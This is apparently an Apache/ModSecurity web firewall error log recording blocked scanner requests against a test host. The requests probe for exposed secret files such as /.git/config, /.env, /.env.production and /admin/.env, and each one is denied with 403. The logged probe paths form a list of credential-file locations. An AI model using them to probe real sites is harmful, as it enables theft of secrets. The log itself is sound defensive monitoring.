[Fri Aug 22 15:42:41.606996 2025] [:error] [pid 2140012] [client 216.81.248.73:42728] [client 216.81.248.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKhz0e98q-eNzPzozA4h5gAAAAI"]
[Fri Aug 22 15:42:41.607160 2025] [:error] [pid 2140012] [client 216.81.248.73:42728] [client 216.81.248.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKhz0e98q-eNzPzozA4h5gAAAAI"]
[Sat Aug 23 00:34:11.053191 2025] [:error] [pid 2162175] [client 45.130.202.65:62887] [client 45.130.202.65] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKjwY4Lqzx1XuQZSb8BVagAAAAU"]
[Sat Aug 23 00:34:11.053435 2025] [:error] [pid 2162175] [client 45.130.202.65:62887] [client 45.130.202.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKjwY4Lqzx1XuQZSb8BVagAAAAU"]
[Sat Aug 23 00:34:11.053585 2025] [:error] [pid 2162175] [client 45.130.202.65:62887] [client 45.130.202.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKjwY4Lqzx1XuQZSb8BVagAAAAU"]
[Tue Aug 26 07:13:07.495882 2025] [:error] [pid 2241550] [client 45.130.203.181:34583] [client 45.130.203.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CY-virvByO9qXKXzE8wAAAAE"]
[Tue Aug 26 07:13:07.497753 2025] [:error] [pid 2241550] [client 45.130.203.181:34583] [client 45.130.203.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CY-virvByO9qXKXzE8wAAAAE"]
[Tue Aug 26 07:13:07.497910 2025] [:error] [pid 2241550] [client 45.130.203.181:34583] [client 45.130.203.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CY-virvByO9qXKXzE8wAAAAE"]
[Tue Aug 26 07:13:07.604616 2025] [:error] [pid 2241552] [client 45.130.203.217:56523] [client 45.130.203.217] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CYzoRJp8QGcfk7oMvfwAAAAM"]
[Tue Aug 26 07:13:07.604817 2025] [:error] [pid 2241552] [client 45.130.203.217:56523] [client 45.130.203.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CYzoRJp8QGcfk7oMvfwAAAAM"]
[Tue Aug 26 07:13:07.605013 2025] [:error] [pid 2241552] [client 45.130.203.217:56523] [client 45.130.203.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK1CYzoRJp8QGcfk7oMvfwAAAAM"]
[Tue Aug 26 07:13:07.711597 2025] [:error] [pid 2246461] [client 45.130.203.229:31121] [client 45.130.203.229] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK1CY2vh8y4rPiySQudG9wAAAAg"]
[Tue Aug 26 07:13:07.711799 2025] [:error] [pid 2246461] [client 45.130.203.229:31121] [client 45.130.203.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK1CY2vh8y4rPiySQudG9wAAAAg"]
[Tue Aug 26 07:13:07.711953 2025] [:error] [pid 2246461] [client 45.130.203.229:31121] [client 45.130.203.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK1CY2vh8y4rPiySQudG9wAAAAg"]
[Sat Sep 06 16:28:03.187679 2025] [:error] [pid 2521930] [client 23.180.120.244:58878] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxE82wHorgih5RQI8dUewAAAAc"]
[Sat Sep 06 16:28:03.190023 2025] [:error] [pid 2521930] [client 23.180.120.244:58878] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxE82wHorgih5RQI8dUewAAAAc"]
[Sat Sep 06 16:28:03.190186 2025] [:error] [pid 2521930] [client 23.180.120.244:58878] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxE82wHorgih5RQI8dUewAAAAc"]
[Sat Sep 06 16:28:03.507506 2025] [:error] [pid 2525773] [client 23.180.120.244:58880] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxE8817Afe8hFPbueQjuQAAAAg"]
[Sat Sep 06 16:28:03.507746 2025] [:error] [pid 2525773] [client 23.180.120.244:58880] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxE8817Afe8hFPbueQjuQAAAAg"]
[Sat Sep 06 16:28:03.507905 2025] [:error] [pid 2525773] [client 23.180.120.244:58880] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxE8817Afe8hFPbueQjuQAAAAg"]
[Sat Sep 06 16:28:03.771220 2025] [:error] [pid 2525775] [client 23.180.120.244:58890] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxE80qQOFzsSPFvI5QBxAAAAAo"]
[Sat Sep 06 16:28:03.771463 2025] [:error] [pid 2525775] [client 23.180.120.244:58890] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxE80qQOFzsSPFvI5QBxAAAAAo"]
[Sat Sep 06 16:28:03.771622 2025] [:error] [pid 2525775] [client 23.180.120.244:58890] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxE80qQOFzsSPFvI5QBxAAAAAo"]
[Sat Sep 06 16:28:04.030587 2025] [:error] [pid 2516674] [client 23.180.120.244:58900] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxE9JuQgqswfhi5vNCS2AAAAAE"]
[Sat Sep 06 16:28:04.030857 2025] [:error] [pid 2516674] [client 23.180.120.244:58900] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxE9JuQgqswfhi5vNCS2AAAAAE"]
[Sat Sep 06 16:28:04.031036 2025] [:error] [pid 2516674] [client 23.180.120.244:58900] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxE9JuQgqswfhi5vNCS2AAAAAE"]
[Sat Sep 06 16:28:04.270230 2025] [authz_core:error] [pid 2516675] [client 23.180.120.244:58902] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Sep 06 16:28:04.546142 2025] [:error] [pid 2525774] [client 23.180.120.244:58918] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxE9JdkF99v8jGNnYL9cAAAAAk"]
[Sat Sep 06 16:28:04.546410 2025] [:error] [pid 2525774] [client 23.180.120.244:58918] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxE9JdkF99v8jGNnYL9cAAAAAk"]
[Sat Sep 06 16:28:04.546589 2025] [:error] [pid 2525774] [client 23.180.120.244:58918] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxE9JdkF99v8jGNnYL9cAAAAAk"]
[Sat Sep 06 16:28:06.167833 2025] [:error] [pid 2521930] [client 23.180.120.244:58954] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxE9mwHorgih5RQI8dUfAAAAAc"]
[Sat Sep 06 16:28:06.168067 2025] [:error] [pid 2521930] [client 23.180.120.244:58954] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxE9mwHorgih5RQI8dUfAAAAAc"]
[Sat Sep 06 16:28:06.168219 2025] [:error] [pid 2521930] [client 23.180.120.244:58954] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxE9mwHorgih5RQI8dUfAAAAAc"]
[Sat Sep 06 16:28:06.410291 2025] [:error] [pid 2525773] [client 23.180.120.244:58970] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxE9s17Afe8hFPbueQjugAAAAg"]
[Sat Sep 06 16:28:06.410561 2025] [:error] [pid 2525773] [client 23.180.120.244:58970] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxE9s17Afe8hFPbueQjugAAAAg"]
[Sat Sep 06 16:28:06.410739 2025] [:error] [pid 2525773] [client 23.180.120.244:58970] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxE9s17Afe8hFPbueQjugAAAAg"]
[Sat Sep 06 16:28:06.686763 2025] [:error] [pid 2525775] [client 23.180.120.244:58982] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxE9kqQOFzsSPFvI5QBxQAAAAo"]
[Sat Sep 06 16:28:06.688136 2025] [:error] [pid 2525775] [client 23.180.120.244:58982] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxE9kqQOFzsSPFvI5QBxQAAAAo"]
[Sat Sep 06 16:28:06.688309 2025] [:error] [pid 2525775] [client 23.180.120.244:58982] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxE9kqQOFzsSPFvI5QBxQAAAAo"]
[Sat Sep 06 19:08:32.546174 2025] [:error] [pid 2516673] [client 195.178.110.161:46098] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxqkMYn8eNvFaPWcnHLdAAAAAA"]
[Sat Sep 06 19:08:32.546465 2025] [:error] [pid 2516673] [client 195.178.110.161:46098] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxqkMYn8eNvFaPWcnHLdAAAAAA"]
